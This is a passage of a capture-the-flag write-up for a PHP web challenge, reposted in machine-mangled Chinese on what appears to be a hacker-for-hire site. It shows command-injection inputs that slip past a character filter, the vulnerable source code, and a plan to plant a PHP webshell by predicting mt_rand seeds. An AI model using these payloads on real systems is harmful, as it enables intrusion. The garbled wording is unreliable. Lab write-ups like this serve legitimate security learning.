ASIS CTF - 三个魔法Web关WriteUp

访客5年前关于黑客接单833

榜首眼看这个应战,通常是过滤一些字符或许添加一些约束来阻挠指令履行,我经过输入&id到addr域,成功回来履行成果,能够确认这是一道指令履行的应战题。

下一步咱们来找出过滤和约束。经过测验,咱们发现不能够输入空格,/,而且只能输入15个字符。
运转find和set指令,咱们能够发现一些信息。
Result of the command find:
.
./index.php
./pages
./pages/ping.php
./pages/Adm1n1sTraTi0n2.php
./files
find: `./files': Permission denied
咱们看到,/pages文件夹下有一些.php文件,/files文件夹,咱们没有权限拜访,还有一个比较风趣的文件叫Adm1n1sTraTi0n2.php

翻开后是一个上传页面,上传图片后,会回来相似file image.png?www.tiechemo.com指令回来的信息,可是咱们不知道上传后的文件保存途径,现在的思路是,只能经过前面的指令履行缝隙来读取php源码,由于过滤了空格和/,所以咱们运用grep来递归读文件,我这儿运用的是&{grep,-nrw,.}
index.php
---------
3magic
 
    '?page=ping'>ping
 
 
    if ($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
  ?>
     
      '?page=Adm1n1sTraTi0n2'>admin
     
 
    }
  ?>
 
 
  if (isset($_GET['page'])) {
    $p = $_GET['page'];
    if (preg_match('/(://)/', $p)) {
      die('attack detected');
    }
    include("pages/".$p.".php");
    die();
  }
  ?>
ping.php
--------
ping
"./?page=ping" method="POST">
  "text" name="addr" placeholder="addr">
  "submit" value="send">
 
"width: 300px; height: 300px" placeholder="result">
if (isset($_POST['addr'])) {
  $addr = $_POST['addr'];
  if (preg_match('/[`;$()| /'>"t]/', $addr)) {
    die("invalid character detected");
  }
  if (strpos($addr, ".php") !== false){
    die("invalid character detected");
  }
  if (strlen($addr) > 15) {
    die("addr is too long");
  }
  @system("timeout 2 bash -c 'ping -c 1 $addr' 2>&1");
}
?>
Adm1n1sTraTi0n2.php
-------------------
image inspector
mt_srand((time() % rand(1,10000) + rand(2000,5000))%rand(1000,9000)+rand(2000,5000));
// files directory flushed every 3min
setcookie('test', mt_rand(), time(), '/');
if (isset($_POST['submit'])) {
  $check = getimagesize($_FILES['file']['tmp_name']);
  if($check !== false) {
    echo 'File is an image - ' . $check['mime'];
    $filename = '/var/www/html/3magic/files/'.mt_rand().'_'.$_FILES['file']['name']; // prevent path traversal
    move_uploaded_file($_FILES['file']['tmp_name'], $filename);
    echo "
n";
    system('/usr/bin/file -b '.escapeshellarg($filename));
    echo "
n";
  } else {
    echo "File is not an image";
  }
}
?>
"?page=Adm1n1sTraTi0n2" method="post" enctype="multipart/form-data">
  Select image to upload:
  "file" name="file">
  "submit" value="Upload Image" name="submit">
index.php:
经过源码能够看出这个文件的page参数有LFI缝隙,可是不能够进一步运用,由于服务器装置的PHP版别,现已修补了%00切断缝隙
图画验证仅仅经过getsizeimage()函数验证了图画巨细,上传的文件名经过文件名+随机数生成
当拜访页面的时分,会经过mt_srand()生成随机数种子,随后会用mt_rand()生成随机数在cookie里,最终结合上传后的文件名,存放到/files目录中
mt_rand()已知的是有缝隙的,咱们能从恣意mt_rand()值中康复种子,假如想了解细节,能够参阅这篇文章http://www.openwall.com/php_mt_seed/README,也能够下载运用东西http://download.openwall.net/pub/projects/php_mt_seed/php_mt_seed-3.2.tar.gz
现在进犯思路清晰了,咱们首要上传一个.php文件,其实就是在一个图片文件的结尾加上,以便绕过getsizeimage()函数。然后在cookie中test字段找到mt_rand()生成的值,运用php_mt_seed东西康复种子,最终再运用mt_rand()结合上传的文件名,拜访/files下的文件。
详细进犯流程如下:

[1] [2]  黑客接单网

相关文章

浅谈跨域威胁与安全-黑客接单平台

WEB前端中最常见的两种安全危险,XSS与CSRF,XSS,即跨站脚本进犯、CSRF即跨站恳求假造,两者归于跨域安全进犯,关于常见的XSS以及CSRF在此不多议论,仅议论一些不太常见的跨域技能以及安全...

百度浏览器的隐私安全问题剖析

首要发现 百度阅读器是微柔和安卓渠道上的一种网络阅读器,个人用户在向服务器传输数据时进行加密,就算加密了也很简略被解密。阅读器更新时或许很轻易地被中心攻击者运用,履行恣意代码。 安卓版别的百度阅读器...

怎么全面防护Webshell(上)?

 事实上,互联网上每时每刻都在上演着进犯和防护,本文将会要点的深化剖析一下其间一个非常重要的类型:webshell。 初识webshell 接下来将演示3种黑客是怎么用力浑身解数将webshell上传...

PHP序列化与反序列化解读

花费了点时刻研讨了下PHP序列化,写在这儿。一是便利自己知识点回忆,二是协助相同有疑问的人,欢迎纠正过错,不喜勿喷. 0×01.确认装备文件 首要体系运用的ubuntu apt-get install...

根据卷积神经网络的SQL注入检测

一、前语 本文结合自然语言处理技能,选用卷积神经网络算法练习SQL注入检测模型,首要包含文本处理、提取文本向量和练习检测模型三个部分。因为自己是初学者,也是通过长辈们的文章来学习这方面的常识,许多当地...

Google最新XSS Game Writeup

本文介绍了怎么完结谷歌最新的XSSGame的进程,完结了这八个应战就有时机取得Nexus 5x。实际上这八个应战整体来说都不难,都是些常见的xss。通关要求是只要能弹出alert窗口即可。 第一关...